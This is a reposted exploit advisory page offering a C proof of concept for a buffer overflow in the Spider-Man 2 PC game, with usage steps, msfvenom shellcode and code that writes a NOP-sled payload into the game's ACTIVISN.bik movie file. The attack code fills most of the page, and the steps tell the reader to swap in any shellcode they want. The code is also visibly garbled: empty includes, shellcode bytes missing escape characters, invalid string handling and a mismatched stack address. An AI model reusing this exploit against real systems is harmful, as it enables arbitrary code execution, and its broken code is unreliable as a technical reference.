Spiderman2 2.1.1 Buffer Overflow ↭ – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 21st, 2020 📆 | 4885 Views ⚑

0

Spiderman2 2.1.1 Buffer Overflow ↭

# Exploit Title: Spiderman2 – Buffer Overflow
# Exploit Author: HexraiN
# Vendor Homepage: https://www.mobygames.com/company/fizz-factor
# Software Link: https://www.mobygames.com/game/spider-man-2-the-game
# Version: 2.1.1
# Tested on: Windows 10 x64
# Greetz : OA Cybersecurity Labs

#Twitter : @smashedkernel

# 1 -> Close DEP for Spiderman.exe
# 2 -> Remove /Your Spiderman Installed File /Movies/ACTIVISN.bik
# 3 -> Change the shellcode with the one you want
# 4 -> Change “installation_path” by yourself.
# 5 -> Compile & Run PoC
# 6 -> Run Game Spiderman.exe
# 7 -> Boom

#include
#include
#include

unsigned char shellcode[] =

# msfvenom -p windows/exec CMD=notepad -e x64/alpha_mixed -f c -v

// SIZE = 192 Bytes

“xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30”
“x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff”
“xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52”
“x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1”
“x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b”
“x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03”
“x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b”
“x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24”
“x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb”
“x8dx5dx6ax01x8dx85xb2x00x00x00x50x68x31x8bx6f”
“x87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5”
“x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6a”
“x00x53xffxd5x6ex6fx74x65x70x61x64x00”;

void main(void)
{
unsigned char *installation_path[] = “C:\Program
Files(x86)\Activision\Spider-Man 2″;
strcpy(installation_path,”\Movies\ACTIVISN.bik”);

char buffer[421];
FILE *vulnerable;

memset(&buffer, 0x90, 421);

long addr = 0xbffff240 + 0xc0; // address to insert into eip ==
address of local buffer in bof + ~192 bytes into nops
memcpy(buffer + 28, &addr, sizeof(long)); // buffer offset at 28 =
location of rip register

memcpy(buffer + sizeof(buffer) – sizeof(shellcode) – 1, shellcode,
sizeof(shellcode));

vulnerable = fopen(installation_path, “w”);
fwrite(buffer, 421, 1, vulnerable);
fclose(vulnerable);
}

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...